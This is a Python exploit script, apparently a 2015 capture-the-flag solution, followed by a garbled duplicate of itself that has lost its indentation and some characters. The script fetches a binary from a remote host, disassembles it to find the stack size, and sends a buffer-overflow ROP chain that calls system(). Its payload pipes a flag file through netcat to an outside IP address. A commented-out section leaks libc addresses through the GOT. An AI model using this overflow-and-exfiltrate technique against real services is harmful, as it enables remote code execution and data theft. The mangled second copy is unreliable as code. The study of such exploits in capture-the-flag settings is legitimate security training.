peternguyen93 · September 21, 2015 02:38
diff --git a/autobots.py b/autobots.py
 #!/usr/bin/python
 import socket
 import re
 from capstone import *
 from Pwn import *
 import sys

 # p = Pwn(mode=1,host='52.20.10.244',port=12351)
 def disas(code):
 	asm = ''
 	md = Cs(CS_ARCH_X86, CS_MODE_64)
 	for i in md.disasm(code, 0x1000):
 		asm += i.op_str
 	return asm

 def getPortSize():
 	p3 = Pwn(host='52.20.10.244',port=8888)
 	p3.connect()
 	bytes = ''
 	d = p3.recv(1024)
 	while 1:
 		if len(d) > 0:
 			bytes += d
 		else:
 			break
 		d = p3.recv(1024)
 	port = p3.unpack(bytes[0x7d5:0x7d5 + 4])
 	size = p3.unpack(bytes[0x82f:0x82f + 4])
 	asm = disas(bytes[0x824:0x824+7])
 	# print asm
 	_match = re.match(r'rcx, qword ptr \[rbp - ([0-9a-fx]*)\]',asm)
 	stack_size = int(_match.group(1),16)
 	p3.close()
 	return port,size,stack_size,bytes

 def getshell(p2,stack_size,system_addr,addr):
 	payload = 'cat flag | nc 128.199.171.28 8001;'
 	payload+= 'A'*(stack_size - 8 - len(payload)) + p2.p32(0x6) + 'AAAA' + 'C'*8

 	rop = [
 		0x4008d3, # pop rdi ; ret
 		addr,
 		system_addr
 	]

 	# rop = [
 	# 	0x4008d3, # pop rdi ; ret
 	# 	0x6,
 	# 	0x04008d1, # pop rsi ; pop r15 ; ret
 	# 	addr,
 	# 	0x41414141,
 	# 	0x4005e0, # write
 	# 	0x40077D, # main
 	# ]

 	payload += p2.pA(rop)
 	p2.send(payload)
 	# leak = p2.recv(1024)
 	# print leak
 	# leak = p2.recv(1024)
 	# print repr(leak)
 	p2.io()

 def leak(p1,stack_size):
 	payload = 'A'*(stack_size - 8) + p1.p32(0x6) + 'AAAA' + 'C'*8

 	rop = [
 		0x4008d3, # pop rdi ; ret
 		0x6,
 		0x04008d1, # pop rsi ; pop r15 ; ret
 		p1.got('listen'),
 		0x41414141,
 		0x4005e0, # write
 		0x40077D, # main
 	]

 	payload += p1.pA(rop)
 	# f = open('bin.pl','w')
 	# f.write(payload)
 	# f.close()
 	p1.send(payload)

 	leak = p1.recv(1024)
 	leak = p1.recv(1024)
 	print repr(leak)
 	listen_addr = 0
 	# if leak != '':
 	# 	listen_addr = p1.unpack(leak[:8])
 	return listen_addr

 def exploit():
 	system_addr = 0x7ffff7a5b640
 	start = 0x7fffffffebc0 + 16
 	# isFound = True
 	# it_time = False
 	while 1:
 		try:
 			_port,size,stack_size,bytes = getPortSize()
 			print '[+] Bot at :',_port
 			print '[+] Recv size:',size
 			print '[+] Stack size:',stack_size
 			# if isFound: # get shell time
 			if (stack_size + 24) > size:
 				print 'Can\'t overflow'
 				continue
 			else:
 				# print '[!!!!]',hex(start)
 				p2 = Pwn(mode=1,host='52.20.10.244',port=_port,pfile='./bin.elf')
 				p2.connect()
 				getshell(p2,stack_size,system_addr,start)
 					# break
 			# if (stack_size + 56) > size:
 			# 	print 'Can\'t overflow'
 			# 	continue

 			# # f = open('./bin.elf','w')
 			# # f.write(bytes)
 			# # f.close()
 			# p1 = Pwn(mode=1,host='52.20.10.244',port=_port,pfile='./bin.elf')
 			# p1.connect()
 			# # p2 = Pwn(mode=1,host='52.20.10.244',port=42462,pfile='./bin.elf')
 			# listen_addr = leak(p1,stack_size)
 			# if listen_addr != 0:
 			# 	system_addr = listen_addr - p1.get_libc_offset(listen_addr,'listen')
 			# 	# # bin_sh_addr = system_addr + 0x13669b

 			# 	print '[+] listen()',hex(listen_addr)
 			# 	print '[+] system()',hex(system_addr)
 			# 	# print '[+] "/bin/sh":',hex(bin_sh_addr)
 			# 	isFound = True
 		except AttributeError:
 			print 'Suck ___^____^___' 
 		except socket.error:
 			print 'Fuck.........'
 	# system_addr = listen_addr - p1.get_libc_offset(listen_addr,'listen')

 	# print '[+] listen()',hex(listen_addr)
 	# print '[+] system()',hex(system_addr)

 exploit()
	#!/usr/bin/python
	import socket
	import re
	from capstone import *
	from Pwn import *
	import sys

	# p = Pwn(mode=1,host='52.20.10.244',port=12351)
	def disas(code):
	asm = ''
	md = Cs(CS_ARCH_X86, CS_MODE_64)
	for i in md.disasm(code, 0x1000):
	asm += i.op_str
	return asm

	def getPortSize():
	p3 = Pwn(host='52.20.10.244',port=8888)
	p3.connect()
	bytes = ''
	d = p3.recv(1024)
	while 1:
	if len(d) > 0:
	bytes += d
	else:
	break
	d = p3.recv(1024)
	port = p3.unpack(bytes[0x7d5:0x7d5 + 4])
	size = p3.unpack(bytes[0x82f:0x82f + 4])
	asm = disas(bytes[0x824:0x824+7])
	# print asm
	_match = re.match(r'rcx, qword ptr \[rbp - ([0-9a-fx]*)\]',asm)
	stack_size = int(_match.group(1),16)
	p3.close()
	return port,size,stack_size,bytes

	def getshell(p2,stack_size,system_addr,addr):
	payload = 'cat flag \| nc 128.199.171.28 8001;'
	payload+= 'A'(stack_size - 8 - len(payload)) + p2.p32(0x6) + 'AAAA' + 'C'8

	rop = [
	0x4008d3, # pop rdi ; ret
	addr,
	system_addr
	]

	# rop = [
	# 0x4008d3, # pop rdi ; ret
	# 0x6,
	# 0x04008d1, # pop rsi ; pop r15 ; ret
	# addr,
	# 0x41414141,
	# 0x4005e0, # write
	# 0x40077D, # main
	# ]

	payload += p2.pA(rop)
	p2.send(payload)
	# leak = p2.recv(1024)
	# print leak
	# leak = p2.recv(1024)
	# print repr(leak)
	p2.io()

	def leak(p1,stack_size):
	payload = 'A'(stack_size - 8) + p1.p32(0x6) + 'AAAA' + 'C'8

	rop = [
	0x4008d3, # pop rdi ; ret
	0x6,
	0x04008d1, # pop rsi ; pop r15 ; ret
	p1.got('listen'),
	0x41414141,
	0x4005e0, # write
	0x40077D, # main
	]

	payload += p1.pA(rop)
	# f = open('bin.pl','w')
	# f.write(payload)
	# f.close()
	p1.send(payload)

	leak = p1.recv(1024)
	leak = p1.recv(1024)
	print repr(leak)
	listen_addr = 0
	# if leak != '':
	# listen_addr = p1.unpack(leak[:8])
	return listen_addr

	def exploit():
	system_addr = 0x7ffff7a5b640
	start = 0x7fffffffebc0 + 16
	# isFound = True
	# it_time = False
	while 1:
	try:
	_port,size,stack_size,bytes = getPortSize()
	print '[+] Bot at :',_port
	print '[+] Recv size:',size
	print '[+] Stack size:',stack_size
	# if isFound: # get shell time
	if (stack_size + 24) > size:
	print 'Can\'t overflow'
	continue
	else:
	# print '[!!!!]',hex(start)
	p2 = Pwn(mode=1,host='52.20.10.244',port=_port,pfile='./bin.elf')
	p2.connect()
	getshell(p2,stack_size,system_addr,start)
	# break
	# if (stack_size + 56) > size:
	# print 'Can\'t overflow'
	# continue

	# # f = open('./bin.elf','w')
	# # f.write(bytes)
	# # f.close()
	# p1 = Pwn(mode=1,host='52.20.10.244',port=_port,pfile='./bin.elf')
	# p1.connect()
	# # p2 = Pwn(mode=1,host='52.20.10.244',port=42462,pfile='./bin.elf')
	# listen_addr = leak(p1,stack_size)
	# if listen_addr != 0:
	# system_addr = listen_addr - p1.get_libc_offset(listen_addr,'listen')
	# # # bin_sh_addr = system_addr + 0x13669b

	# print '[+] listen()',hex(listen_addr)
	# print '[+] system()',hex(system_addr)
	# # print '[+] "/bin/sh":',hex(bin_sh_addr)
	# isFound = True
	except AttributeError:
	print 'Suck ___^____^___'
	except socket.error:
	print 'Fuck.........'
	# system_addr = listen_addr - p1.get_libc_offset(listen_addr,'listen')

	# print '[+] listen()',hex(listen_addr)
	# print '[+] system()',hex(system_addr)

	exploit()